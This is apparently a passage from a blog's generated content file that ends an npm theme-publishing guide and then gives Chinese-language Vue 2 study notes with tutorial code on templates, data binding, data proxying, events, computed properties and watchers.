    "author": "Gz-Metal-Cell",
    "license": "MIT",
    "bugs": {
    "url": "https://github.com/GZ-Metal-Cell/hexo-theme-quieter/issues"
    },
    "homepage": "https://github.com/GZ-Metal-Cell/hexo-theme-quieter#readme",
    "devDependencies": {
    "hexo": "^6.1.0",
    "hexo-renderer-ejs": "^2.0.0",
    "hexo-renderer-less": "^4.0.0",
    "crypto-js": "^4.2.0"
    }
    }

Publish the package

npm publish

Post-publish management

• The package can be viewed and managed on the npm website.
• To release an update, change the code, bump the version field in package.json, and run npm publish again.
  • npm refuses to publish a version number that already exists, so the version must differ from every previous release.
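
For instance, a sketch of the release loop with npm version, which bumps package.json and creates a git commit and tag in one step (the version numbers shown are illustrative):

npm version patch   # e.g. 1.0.0 -> 1.0.1 (use minor / major for bigger changes)
npm publish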
    ]]>
    @@ -220,7 +220,7 @@ /posts/Web-Vue%EF%BC%88Vue%20%E6%A0%B8%E5%BF%83%EF%BC%89/ - 资源

    目录

    1. Vue 核心
    2. Vue 组件化编程
    3. 使用 Vue 脚手架
    4. Vue 中的 ajax
    5. vuex
    6. vue-router
    7. Vue UI 组件库

    正文

    一、初识 Vue

    001 课程简介

    Vue2(4 年、70+ 更新)→Vue3(未来趋势)

    Vue:

    • vue 基础
    • vue-cli
    • vue-router
    • vuex
    • element-ui
    • vue3

    002 Vue 简介

    Vue 是什么?

一套用于构建用户界面的渐进式 JavaScript 框架。

    构建用户界面:将后端的数据转换为界面(DOM)显示

渐进式:Vue 可以自底向上逐层地应用

    • 简单应用:只需一个轻量小巧的核心库
    • 复杂应用:可以引入各式各样的 Vue 插件

    谁开发的?

    ​尤雨溪:yyx990803 (Evan You)

年份与描述:
• 2013 年:受 Angular 框架启发,尤雨溪开发出一款轻量框架 Seed;同年 12 月,Seed 更名为 Vue,版本号 0.6.0。
• 2014 年:Vue 正式对外发布,版本号 0.8.0;Taylor Otwell 在 Twitter 上发表动态,说自己正在学习 Vue.js。
• 2015 年:10 月 27 日,正式发布 Vue 1.0.0 Evangelion(新世纪福音战士)。
• 2016 年:10 月 1 日,正式发布 Vue 2.0.0 Ghost in the Shell(攻壳机动队)。
• 2020 年:9 月 18 日,正式发布 Vue 3.0.0 One Piece(海贼王)。

    ​后起之秀,生态完善,已然成为国内前端工程师必备技能。

    Vue 的特点

    • 采用组件化模式,提高代码复用率、且让代码更好维护。

    webp

    ​像网页中的各个组件的 DOM,用对应的 vue 文件来表示,vue 中集成了 Html、CSS、JS 中的内容。各个组件不会互相影响。

    数据(persons)

    [
    {id: '001',name: '张三',age: 18},
    {id:'002',name:'李四',age:19},
    {id:'003',name:'王五',age:20}
    ]

    容器(DOM)

    <ul id="list"></ul>

    效果

    • 001 - 张三 - 18
    • 002 - 李四 - 19
    • 003 - 王五 - 20
    • 声明式编码,让编码人员无需直接操作 DOM,提高开发效率。

    命令式编码

// 准备 html 字符串
let htmlStr = ''
// 遍历数据拼接 html 字符串
persons.forEach(p => {
htmlStr += `<li>${p.id}-${p.name}-${p.age}</li>`
});
// 获取 list 元素
let list = document.getElementById('list')
// 修改内容(亲自操作 DOM)
list.innerHTML = htmlStr

    声明式编码

    <ul id="list">
    <li v-for="p in persons">
    {{p.id}}-{{p.name}}-{{p.age}}
    </li>
    </ul>
    • 使用虚拟 DOM+优秀的 Diff 算法,尽量复用 DOM 节点。

    原生 Javascript 实现将数据转换为视图:

    <!-- 展示人员列表的容器 -->
    <ul id="list"></ul>

<script type="text/javascript">
// 一些人的数据
let persons = [
{id:'001', name:'张三', age:18},
{id:'002', name:'李四', age:19},
{id:'003', name:'王五', age:20}
]

// 准备 html 字符串
let htmlStr = ''

// 遍历数据拼接 html 字符串
persons.forEach(p => {
htmlStr += `<li>${p.id}-${p.name}-${p.age}</li>`
});

// 获取 list 元素
let list = document.getElementById('list')

// 修改内容(亲自操作 DOM)
list.innerHTML = htmlStr
</script>

    得到:

    • 001 - 张三 - 18
    • 002 - 李四 - 19
    • 003 - 王五 - 20

    webp

    ​原生 JavaScript 直接将数据转化到页面真实 DOM(Real-DOM)。如果数据有更新,需要重新渲染整个 DOM。

    webp

    ​Vue 引入了虚拟 DOM(Virtual-DOM)的概念。

    ​在 Vue 中,Diff(全称:差异算法)是指在更新视图时,Vue 通过对比新旧虚拟 DOM(Virtual DOM)树,计算出最小的变化差异,并通过这些差异来更新真实的 DOM。

    1. 虚拟DOM的概念

    ​虚拟 DOM(Virtual DOM)是 Vue 用来提高性能的一种技术。它通过在内存中创建一棵与实际 DOM 结构相对应的虚拟 DOM 树,然后在数据变化时,只对比新旧虚拟 DOM 的差异,最终只将最小的差异更新到真实的 DOM 中,而不是每次数据变化时都重新渲染整个 DOM。

    2. Diff 算法的过程

    ​当组件的状态或数据发生变化时,Vue 会生成新的虚拟 DOM,并与旧的虚拟DOM 进行对比。这个对比的过程就是 Diff 算法的核心。Diff 算法的主要目标是通过高效的方式找出新旧虚拟 DOM 树的差异,并最小化 DOM 更新的开销。

    ​具体的 Diff 步骤可以分为以下几个关键过程:

    • 节点类型比较:Vue 会首先判断新旧节点是否是同一个类型。如果是同类型节点,继续对子节点进行比较;如果不是同类型节点,直接替换整个节点。
• 属性比较:对于同类型的节点,Vue 会逐一比较它们的属性(如 class、style 等)。只有当属性发生变化时,Vue 才会更新这些属性。
    • 子节点比较:Vue 使用一些优化策略来比较子节点。比如它会在相同的父节点下,使用一个双指针的方式(前后两个指针分别指向新旧子节点),通过遍历来找出差异,避免不必要的遍历。
    • Key 的使用:Vue 建议在列表渲染时为每个子元素添加一个 key,这样可以帮助 Vue 更高效地定位元素,减少不必要的重排和重绘。

    3. Diff 算法的优化

    Vue 中的 Diff 算法是经过优化的,主要通过以下几点提高性能:

    • 最小化比较范围:在树的同一层级内,Vue 通过双指针的方式来比较子节点,而不是完全重新遍历所有子节点。
    • 跳过不必要的更新:如果新旧节点内容完全相同,Vue 会跳过这个节点的更新。
    • 分层更新:Vue 会优先更新那些改变了的节点,而不需要重新渲染整个树。

    4. 为什么需要 Diff 算法

    ​DOM 操作通常是非常耗费性能的,尤其是在数据频繁变化的场景中。Vue 通过使用虚拟 DOM 和 Diff 算法,能够显著减少不必要的 DOM 操作,从而提升性能。

    学习 Vue 之前要掌握的 JavaScript 基础知识?

    ES6 语法规范

    ​ES6(ECMAScript 2015)是 JavaScript 的一个重要更新版本,它带来了许多新的语法特性,能使代码更加简洁和高效。主要包括:

• let 和 const:let 用于声明可变的变量,const 用于声明常量。
    • 箭头函数:简化函数书写,并且箭头函数的 this 绑定是词法作用域,而非动态绑定。
    const add = (a, b) => a + b;
    • 模板字符串:允许使用 ${} 插入变量,使字符串拼接更加直观。
    let name = "Vue";
    console.log(`Welcome to ${name}`);
    • 解构赋值:可以快速从数组或对象中提取值,并赋予变量。
    const [a, b] = [1, 2]; // 解构数组
    const { name, age } = { name: "Alice", age: 25 }; // 解构对象
    • 默认参数:函数参数可以设置默认值。
    function greet(name = "Guest") {
    console.log(`Hello, ${name}!`);
    }
    • 扩展运算符(spread/rest):简化数组和对象的操作。
    let arr = [1, 2, 3];
    let newArr = [...arr, 4, 5]; // 扩展数组

    const obj = { a: 1, b: 2 };
    const newObj = { ...obj, c: 3 }; // 扩展对象
    ES6 模块化

ES6 引入了模块化机制,通过 import 和 export 使得代码更易维护和重用。模块化的关键:

    • 导出:模块中可以通过 export 导出变量、函数或类。
    // person.js
    export const name = 'Alice';
    export function greet() {
    console.log("Hello!");
    }
    • 导入:其他模块通过 import 来使用导出的内容。
    // app.js
    import { name, greet } from './person.js';
    greet();
    console.log(name);
    包管理器

在现代 JavaScript 开发中,包管理器(如 npm、yarn)用于管理项目中的依赖包,安装、更新、卸载模块。

    • npm(Node Package Manager):是 Node.js 默认的包管理器,帮助开发者下载并管理第三方库和工具。
    npm init -y      # 初始化一个新的 package.json 文件
    npm install vue # 安装 Vue.js 库
    npm install # 安装项目中的所有依赖
    • yarn:是 Facebook 推出的包管理工具,相比 npm 在性能和并发性上有些优化。
    yarn init         # 初始化项目
    yarn add vue # 安装 Vue.js 库
    yarn install # 安装项目依赖
    原型与原型链

    ​JavaScript 是基于原型的语言,每个对象都有一个 prototype 属性,指向其原型对象。原型链是通过对象的 prototype 属性连接起来的链式结构。通过原型链可以实现继承。

    • 原型:每个函数都有一个 prototype 属性,用于定义该函数创建的对象的共享属性和方法。
    function Person(name) {
    this.name = name;
    }

    Person.prototype.sayHello = function() {
    console.log("Hello, " + this.name);
    };

    const person = new Person('John');
    person.sayHello(); // Hello, John
    • 原型链:对象通过 __proto__ 访问原型,从而实现继承。
    const obj = { name: 'Vue' };
    console.log(obj.__proto__); // 访问 obj 的原型对象
    数组常用方法

    ​在日常开发中,JavaScript 数组的方法非常重要。以下是一些常用的数组方法:

    • map():返回一个新数组,数组中的每个元素都经过回调函数处理。
    const arr = [1, 2, 3];
    const result = arr.map(x => x * 2); // [2, 4, 6]
    • filter():返回一个新数组,包含所有通过条件测试的元素。
    const arr = [1, 2, 3, 4];
    const result = arr.filter(x => x > 2); // [3, 4]
    • reduce():通过回调函数将数组值汇总为单一的值。
    const arr = [1, 2, 3];
    const sum = arr.reduce((acc, curr) => acc + curr, 0); // 6
    • forEach():对数组的每个元素执行一个回调函数,不返回新数组。
    const arr = [1, 2, 3];
    arr.forEach(x => console.log(x)); // 输出 1, 2, 3
    Axios

    Axios 是一个基于 Promise 的 HTTP 客户端,用于浏览器和 Node.js。它常用于向后端 API 发起请求。

    • 发送 GET 请求
    axios.get('https://api.example.com/data')
    .then(response => {
    console.log(response.data);
    })
    .catch(error => {
    console.error(error);
    });
    • 发送 POST 请求
    axios.post('https://api.example.com/data', { name: 'Vue' })
    .then(response => {
    console.log(response.data);
    })
    .catch(error => {
    console.error(error);
    });
    Promise

    Promise 是 JavaScript 中用于处理异步操作的对象,它有三种状态:pending(等待中)、resolved(已完成)、rejected(已拒绝)。

    • 创建 Promise
    const promise = new Promise((resolve, reject) => {
    let success = true;
    if (success) {
    resolve('Success!');
    } else {
    reject('Failed!');
    }
    });
    • 使用 .then().catch()
    promise
    .then(result => console.log(result)) // Success!
    .catch(error => console.log(error)); // Failed!
    • 链式调用
    new Promise((resolve, reject) => {
    resolve(1);
    })
    .then(value => value + 2)
    .then(value => value * 3)
    .then(value => console.log(value)); // 9

    003 Vue 官网使用指南

    004 搭建 Vue 开发环境

    ​从 安装 — Vue.js 获取 Vue2 的代码,得到文件:vue.js(开发版本,包含完整的警告和调试模式) 和 vue.min.js(上线时使用,删除了所有警告信息,体积更小)。

    webp

    ​将下载好的文件导入到项目中,如此组织项目中的文件。

    ​在 VSCode 下的空白 html 文件中,输入 ! 后再按 Tab 键即可快速生成模板,此后修改文件内容:

    <!DOCTYPE html>
    <html lang="en">
    <head>
    <meta charset="UTF-8">
    <title>Document</title>
    <!-- 引入 Vue -->
    <script type="text/javascript" src="../js/vue.js"></script>
    </head>
    <body>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    </script>
    </body>
    </html>

    ​安装 Vue DevTools 便于开发者调试:Vue.js devtools - Microsoft Edge Addons

    ​此时 Vue 开发环境搭建完成。

    005-006 Hello 小案例 & 分析

    ​在 VSCode 中,输入 div#root 可以快速生成 <div id="root"></div>


    初识 Vue:

    1. 想让 Vue 工作,就必须创建一个 Vue 实例,且要传入一个配置对象;

    2. root 容器里的代码依然符合 html 规范,只不过混入了一些特殊的 Vue 语法;

    3. root 容器里的代码被称为 Vue 模板

    4. Vue 实例和容器是一一对应的;

    5. 真实开发中只有一个 Vue 实例,并且会配合着组件一起使用;

    6. {{}} 中的内容要写 js 表达式,且内容可以自动读取到 data 中的所有属性;

      注意区分 js 表达式和 js 代码(语句)

      • 表达式:一个表达式会产生一个值,可以放在任何一个需要值的地方:
        • a
        • a + b
        • demo(1)
        • x === y ? 'a' : 'b'
      • js 代码(语句)
        • if(){}
        • for(){}
    7. 一旦 data 中的数据发生改变,那么模板中用到该数据的地方也会自动更新

    <div id="root">
    <h1>Hello, {{name.toUpperCase()}}</h1>
    <h1>I'm {{age}} years old.</h1>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    new Vue({
    el: "#root", // el 用于指定当前 Vue 实例为哪个容器服务,值通常为 css 选择器字符串(类/id)。
    data: {
    name: 'Gul’dan',
    age: '18'
    }
    })
    </script>

    二、Vue 模板语法

    007 模板语法

    ​Vue 模板语法有两大类:

    1. 插值语法
      • 功能:用于解析标签体内容
      • 写法:{{xxx}},xxx 是 js 表达式,且可以直接读取到 data 中的所有属性。
    2. 指令语法
      • 功能:用于解析标签(包括:标签属性、标签体内容、绑定事件……)
      • 举例:v-bind:href="xxx" 或简写为 :href="xxx",xxx 同样要写 js 表达式,且可以直接读取到 data 中的所有属性。
      • 备注:Vue 中有很多的指令,且形式都是:v-????,此处我们只是拿 v-bind 举个例子。
    <div id="root">
    <h1>Hello, {{player.name}}</h1>
<a :href="url">点击打开百度!</a>
<a v-bind:href="url">点击打开百度!</a>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    new Vue({
    el: '#root',
    data: {
    player:{
    name: 'Gul’dan'
    },
    url: 'http://www.baidu.com'
    }
    })
    </script>

    三、数据绑定

    008 数据绑定

    Vue 中有两种数据绑定的方式:

    1. 单向绑定 v-bind:数据只能从 data 流向页面。

    2. 双向绑定 v-model:数据不仅能从 data 流向页面,还可以从页面流向 data。

      备注:

• 双向绑定一般都应用在表单类元素(输入类元素)上(如:input、select 等)
      • v-model:value 可以简写为 v-model,因为 v-model 默认收集的就是 value 值。
    <div id="root">
    单向数据绑定:<input type="text" :value="name"><br/>
    双向数据绑定:<input type="text" v-model:value="name"><br/>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    new Vue({
    el: '#root',
    data: {
    name: '123456'
    }
    })
    </script>

    webp

    ​修改上面输入框的值不会更改 Vue 实例中的 data;

    ​修改下面输入框的值会更改 Vue 实例中的 data,进而影响上面输入框的值。

    四、el 与 data 的两种写法

    009 el 与 data 的两种写法

    1. el 的两种写法

      • new Vue 时配置 el 属性。

      • 先创建 Vue 实例,随后再通过 vm.$mount('#root') 指定 el 的值。

    2. data 有两种写法

      • 对象式
      • 函数式

      如何选择:目前哪种写法都可以,以后学习到组件时,data 必须使用函数式,否则会报错。

一个重要的原则:由 Vue 管理的函数,一定不要写箭头函数,一旦写了箭头函数,this 就不再是 Vue 实例了(而是 window)。对比示例见下方代码之后。

    <div id="root">
    <h1>你好,{{name}}</h1>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    data() {
    return {name: '古尔丹'}
    }
    })

    setTimeout(() => {
    v.$mount('#root')
    }, 1000)
    </script>
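
To see the arrow-function rule in action, here is a small contrast sketch (added for illustration, not part of the original notes):

// assuming vue.js is loaded as in the examples above
new Vue({
el: '#root',
data: { name: '古尔丹' },
methods: {
normal() {
console.log(this.name) // ordinary function: this is the vm, so the name is printed
},
broken: () => {
// arrow functions have no `this` of their own; it is taken from the
// enclosing scope, so this is window here and this.name is window.name
// (usually an empty string), not the vm's data
console.log(this.name)
}
}
})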

    五、MVVM 模型

    010 理解 MVVM

    ​在软件开发中,MVVM(Model-View-ViewModel) 是一种软件架构模式,广泛应用于前端开发,尤其是在以数据驱动的用户界面(UI)中,比如 WPF、Xamarin 和前端框架(如 Vue、Angular 等)。它通过将用户界面逻辑和业务逻辑进行分离,简化了应用的状态管理和数据绑定。MVVM 模式包含三个主要组件:

    1. Model(模型)
      Model 是应用程序的数据层,通常包含业务逻辑和数据结构。它负责从数据源(如数据库、API 等)获取数据,并提供相关的业务逻辑处理。
    2. View(视图)
      View 是用户界面层,负责显示数据和接收用户的交互。View 通常包含界面布局和样式文件,如 HTML 或 XAML。它的职责是呈现数据,但不负责逻辑处理。
    3. ViewModel(视图模型)
      ViewModel 充当 View 和 Model 之间的桥梁。它包含 UI 所需的数据和状态,监听用户的输入并更新 Model,同时将 Model 的数据转换成 View 可使用的形式。View 和 ViewModel 之间一般通过数据绑定来实现通信。

    MVVM 的关键特点

    • 双向数据绑定
      在 MVVM 中,View 和 ViewModel 之间的数据绑定是双向的:View 绑定到 ViewModel 的属性,ViewModel 的属性值改变时,View 会自动更新;反之,用户在 View 中的输入会更新 ViewModel 中的属性。这种双向绑定极大地减少了手动更新 UI 的需求。
    • 命令模式
      ViewModel 提供命令(Commands),由 View 绑定,用于处理用户的操作(如点击按钮)。通过命令,ViewModel 可以与业务逻辑进行交互,而无需让 View 直接处理事件。
    • 可测试性
      MVVM 模式使得 ViewModel 可以与 UI 分离,便于单元测试。因为 ViewModel 不直接依赖 View,可以在不使用 UI 的情况下进行逻辑测试。

    webp

    1. M:模型 (Model):对应 data 中的数据
    2. V:视图 (View):模板
    3. VM:视图模型 (ViewModel):Vue 实例对象

    webp

    观察发现:

    1. data 中所有的属性,最后都出现在了 vm 身上。
    2. vm 身上所有的属性及 Vue 原型上所有属性,在 Vue 模板中都可以直接使用。

    webp

    六、数据代理

    011 Object.defineProperty

    Object.defineProperty 是 JavaScript 中的一个方法,允许你精确控制对象属性的行为。它在定义或修改对象属性时提供了额外的控制,如设置属性的可枚举性、可配置性和可写性。与直接赋值方式不同,Object.defineProperty 可以定义“属性描述符”(property descriptors),包括数据描述符和访问器描述符。其基本语法如下:

    Object.defineProperty(obj, prop, descriptor)
    • 参数说明
      • obj:要在其上定义属性的对象。
      • prop:要定义或修改的属性名称(字符串)。
      • descriptor:描述属性行为的对象。
    • 属性描述符
      1. 数据描述符(Data Descriptor):包含值和一些标志,指定属性的行为。常见属性:
        • value:属性的值(默认是 undefined)。
        • writable:布尔值,表示属性是否可被赋值运算符修改(默认是 false)。
• enumerable:布尔值,表示属性是否可枚举(即能否被 for...in 或 Object.keys 枚举)(默认是 false)。
        • configurable:布尔值,表示属性描述符是否可以被删除或进一步修改(默认是 false)。
      2. 访问器描述符(Accessor Descriptor):定义 getter 和 setter 函数。
        • get:函数,作为属性的 getter(读取属性值时调用)。默认是 undefined
        • set:函数,作为属性的 setter(写入属性值时调用)。默认是 undefined
• enumerable 和 configurable:同数据描述符。

    ​在控制台中测试:

    let number = 18
    let person = {
    name: '张三',
    sex: '男',
    }

    Object.defineProperty(person, 'age', {
    // value: 18,
    // enumerable: true, // 控制属性是否可以枚举,默认值是 false
    // writable: true, //控制属性是否可以被修改,默认值是 false
    // configurable: true, //控制属性是否可以被删除,默认值是false

    // 当有人读取 person 的 age 属性时,get 函数 (getter) 就会被调用,且返回值就是 age 的值
    get() {
    console.log('有人读取 age 属性了')
    return number
    },

    // 当有人修改 person 的 age 属性时,set 函数 (setter) 就会被调用,且会收到修改的具体值
    set(value) {
    console.log('有人修改了 age 属性,且值是', value)
    number = value
    }
    })

    webp

    012 理解数据代理

    数据代理:通过一个对象代理对另一个对象中属性的操作(读/写)

    let obj = {x:100}
    let obj2 = {y:200}

    Object.defineProperty(obj2, 'x', {
    get() {
    return obj.x
    },
    set(value) {
    obj.x = value
    }
    })

    webp

    ​此时,修改 obj2.x 的值也会影响 obj.x 的值。

    013 Vue 中的数据代理

    ​Vue 中用到了数据代理技术,便于开发者编写代码。

    webp

    ​访问/修改 vm.name 的值相当于访问/修改 vm._data.name 的值。
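
A simplified sketch of how such a proxy can be built (illustrative only; Vue's real implementation also layers reactivity on top):

function proxyData(vm) {
// define a same-named accessor on vm for every key in vm._data
Object.keys(vm._data).forEach(key => {
Object.defineProperty(vm, key, {
get() { return vm._data[key] },
set(value) { vm._data[key] = value }
})
})
}

const fakeVm = { _data: { name: '张三' } }
proxyData(fakeVm)
console.log(fakeVm.name) // '张三', actually read from fakeVm._data.name
fakeVm.name = '李四'      // actually writes fakeVm._data.name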

    七、事件处理

    014 事件处理

    事件的基本使用:

    1. 使用 v-on:xxx@xxx 绑定事件,其中 xxx 是事件名;
    2. 事件的回调需要配置在 methods 对象中,最终会在 vm 上;
    3. methods 中配置的函数,不要用箭头函数!否则 this 就不是 vm 了;
    4. methods 中配置的函数,都是被 vue 所管理的函数,this 的指向是 vm 或组件实例对象;
    5. @click="demo"@click="demo($event)" 效果一致,但后者可以传参;

    webp

    <div id="root">
    <h2>欢迎来到 {{name}} 学习</h2>
    <!-- <button v-on:click="showInfo">点我提示信息</button> -->
    <button @click="showInfo1">点我提示信息 1(不传参)</button>
    <!-- 如果不需要获取点击事件,则不需要参数 $event -->
    <button @click="showInfo2($event, 66)">点我提示信息 2(传参)</button>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    name: 'Vue'
    },
    methods: {
    showInfo1(event) {
    alert('你好啊朋友!')
    },
    showInfo2(event, number) {
    console.log(event, number)
    alert('圣光会制裁你!')
    }
    }
    })
    </script>

    015 事件修饰符 & 017 事件总结

    Vue 中的事件修饰符:

    1. prevent:阻止默认事件(常用);
    2. stop:阻止事件冒泡(常用);
    3. once:事件只触发一次(常用);
    4. capture:使用事件的捕获模式;
    5. self:只有 event.target 是当前操作的元素时才触发事件;
    6. passive:事件的默认行为立即执行,无需等待事件回调执行完毕。

    ​在 JavaScript 中,事件捕获(Event Capturing)和事件冒泡(Event Bubbling)是事件传播的两个阶段,用于描述事件在 DOM 中的传递顺序。它们分别定义了事件在触发时如何从一个元素传递到另一个元素。

    ​事件传播在 DOM 中经过以下三个阶段:

    • 捕获阶段(Capturing Phase):事件从最顶层的祖先元素(通常是 window)开始向下传递,直到目标元素。
    • 目标阶段(Target Phase):事件到达触发该事件的目标元素本身。
    • 冒泡阶段(Bubbling Phase):事件从目标元素开始向上传递,依次经过其祖先元素,直到 window
    <!DOCTYPE html>
    <html lang="en">
    <head>
    <meta charset="UTF-8">
    <title>Document</title>
    <!-- 引入 Vue -->
    <script type="text/javascript" src="../js/vue.js"></script>
    <style>
    * {
    margin-top: 20px;
    }
    .demo1 {
    height: 50px;
    background-color: skyblue;
    }
    .box1 {
    padding: 5px;
    background-color: skyblue;
    }
    .box2 {
    padding: 5px;
    background-color: orange;
    }
    .list {
    width: 200px;
    height: 20px;
    background-color: peru;
    overflow: auto;
    }
    li {
    height: 100px;
    }
    </style>
    </head>
    <body>
    <div id="root">
    <h2>欢迎来到 {{name}} 学习</h2>
    <!-- 阻止默认事件(常用) -->
    <a href="https://www.baidu.com" @click.prevent="showInfo">点我提示信息</a>
    <!-- 阻止事件冒泡(常用) -->
    <div class="demo1" @click="showInfo">
    <button @click.stop="showInfo">点我提示信息</button>
    </div>
    <!-- 事件只触发一次(常用) -->
    <button @click.once="showInfo">点我提示信息</button>
    <!-- 使用事件的捕获模式 -->
    <div class="box1" @click.capture="showMsg(1)">
    div1
    <div class="box2" @click="showMsg(2)">
    div2
    </div>
    </div>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    name: 'Vue'
    },
    methods: {
    showInfo(e) {
    alert('你好啊朋友!')
    },
    showMsg(msg) {
    alert(msg)
    }
    }
    })
    </script>
    </body>
    </html>

    ​事件修饰符可以连着写,如 @click.stop.prevent 表示先阻止冒泡,再阻止默认事件。

    016 键盘事件 & 017 事件总结

    1. Vue 中常用的按键别名:

      • 回车 => enter

      • 删除 => delete(捕获“删除”和“退格”键)

      • 退出 => esc

      • 空格 => space

      • 换行 => tab

      • 上 => up

      • 下 => down

      • 左 => left

      • 右 => right

    2. Vue 未提供别名的按键,可以使用按键原始的 key 值去绑定,但注意要转为 kebab-case(短横线命名)

      • CapsLock 键应转为 caps-lock
    3. 系统修饰键(用法特殊):ctrl、alt、shift、meta

      • 配合 keyup 使用:按下修饰键的同时,再按下其他键,随后释放其他键,事件才被触发

        • @keyup.ctrl.y 必须按下并释放 Ctrl + y 才可以生效。
      • 配合 keydown 使用:正常触发事件。

    4. 也可以使用 keycode 去指定具体的按键(不推荐)

5. Vue.config.keyCodes.自定义键名 = 键码,可以去定制按键别名(示例见下方代码之后)。

    <div id="root">
    <h2>欢迎来到 {{name}} 学习</h2>
    <input type="text" placeholder="按下回车提示输入" @keyup.enter="showInfo">
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    name: 'Vue'
    },
    methods: {
    showInfo(e) {
    console.log(e.target.value);
    }
    }
    })
    </script>

    ​这段代码将在按下 enter 键后调用 showInfo() 以显示输入框里的值。
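
As noted in point 5 above, a custom key alias can be registered like this (a sketch; the alias name `huiche` is arbitrary):

Vue.config.keyCodes.huiche = 13 // 13 is the keyCode of Enter
// in the template: <input @keyup.huiche="showInfo"> now behaves like @keyup.enter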

    八、计算属性

    018 姓名案例

    <div id="root">
    姓:<input type="text" v-model="firstName"><br/>
    名:<input type="text" v-model="lastName"><br/>
    姓名:<span>{{firstName}}-{{lastName}}</span>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    firstName: '张',
    lastName: '三'
    }
    })
    </script>
    <div id="root">
    姓:<input type="text" v-model="firstName"><br />
    名:<input type="text" v-model="lastName"><br />
    姓名:<span>{{fullName()}}</span>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    firstName: '张',
    lastName: '三'
    },
    methods: {
    fullName() {
    return this.firstName + '-' + this.lastName
    }
    }
    })
    </script>

    019 计算属性

    计算属性:

    1. 定义:要用的属性不存在,要通过已有属性计算得来。
2. 原理:底层借助了 Object.defineProperty 方法提供的 getter 和 setter。
    3. get() 什么时候执行?
      • 初次读取时会执行一次。
      • 当依赖的数据发生改变时会被再次调用。
    4. 优势:与 methods 实现相比,内部有缓存机制(复用),效率更高,调试方便。
    5. 备注:
      • 计算属性最终会出现在 vm 上,直接读取使用即可。
      • 如果计算属性要被修改,那必须写 set() 函数去响应修改,且 set() 中要引起计算时依赖的数据发生改变

    ​使用 computed 实现计算属性。

    <div id="root">
    姓:<input type="text" v-model="firstName"><br/>
    名:<input type="text" v-model="lastName"><br/>
    姓名:<input type="text" v-model="fullName"><br/>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    firstName: '张',
    lastName: '三'
    },
    computed: {
    fullName: {
    // get() 有什么作用?当有人读取 fullName 时,get() 就会被调用,且返回值就作为 fullName 值;
    // get() 什么时候调用?
    // 1. 初次读取 fullName 时;
    // 2. 所依赖的数据发生变化时。
    get() {
    return this.firstName + '-' + this.lastName
    },
    set(value) {
    const arr = value.split('-')
    this.firstName = arr[0]
    this.lastName = arr[1]
    }
    }
    }
    })
    </script>

    020 计算属性_简写

    ​将 fullName: {get(){}}fullName(){} 简写。

    <div id="root">
    姓:<input type="text" v-model="firstName"><br />
    名:<input type="text" v-model="lastName"><br />
    姓名:<input type="text" v-model="fullName"><br />
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    firstName: '张',
    lastName: '三'
    },
    computed: {
    fullName() {
    return this.firstName + '-' + this.lastName
    }
    }
    })
    </script>

    九、监视属性

    021 天气案例

    <div id="root">
    <h2>今天天气很{{info}}</h2>
    <!-- <button @click="isHot = !isHot">切换天气</button> -->
    <button @click="changeWeather()">切换天气</button>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    isHot: true
    },
    computed: {
    info() {
    return this.isHot ? '炎热' : '凉爽'
    }
    },
    methods: {
    changeWeather() {
    this.isHot = !this.isHot
    }
    }
    })
    </script>

    022 监视属性

watch 可以监视指定的属性是否被改变。


    监视属性 watch

    1. 当被监视的属性变化时,回调函数自动调用,进行相关操作
    2. 监视的属性必须存在,才能进行监视!!
    3. 监视的两种写法:
      • new Vue 时传入 watch 配置
      • 通过 v.$watch 监视
    <div id="root">
    <h2>今天天气很{{info}}</h2>
    <!-- <button @click="isHot = !isHot">切换天气</button> -->
    <button @click="changeWeather()">切换天气</button>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    isHot: true
    },
    computed: {
    info() {
    return this.isHot ? '炎热' : '凉爽'
    }
    },
    methods: {
    changeWeather() {
    this.isHot = !this.isHot
    }
    },
    watch: {
    isHot: {
    // immediate: true, 开始时调用一次
    handler(newValue, oldValue) {
    console.log('isHot 被修改了', newValue, oldValue)
    }
    }
    }
    })
    </script>

    ​也可以这么写:

    Vue.config.productionTip = false  // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    isHot: true
    },
    computed: {
    info() {
    return this.isHot ? '炎热' : '凉爽'
    }
    },
    methods: {
    changeWeather() {
    this.isHot = !this.isHot
    }
    }
    })

    v.$watch('isHot', {
    // immediate: true, 开始时调用一次
    handler(newValue, oldValue) {
    console.log('isHot 被修改了', newValue, oldValue)
    }
    })

    023 深度监视

    深度监视:

